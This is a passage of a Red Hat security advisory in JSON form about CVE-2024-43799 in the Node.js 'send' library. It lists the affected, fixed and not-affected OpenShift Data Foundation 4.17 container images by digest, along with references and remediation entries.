"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311153"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "send: Code Execution Vulnerability in Send Library",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43799"
},
{
"category": "external",
"summary": "RHBZ#2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35",
"url": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg",
"url": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg"
}
],
"release_date": "2024-09-10T15:15:17.727000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
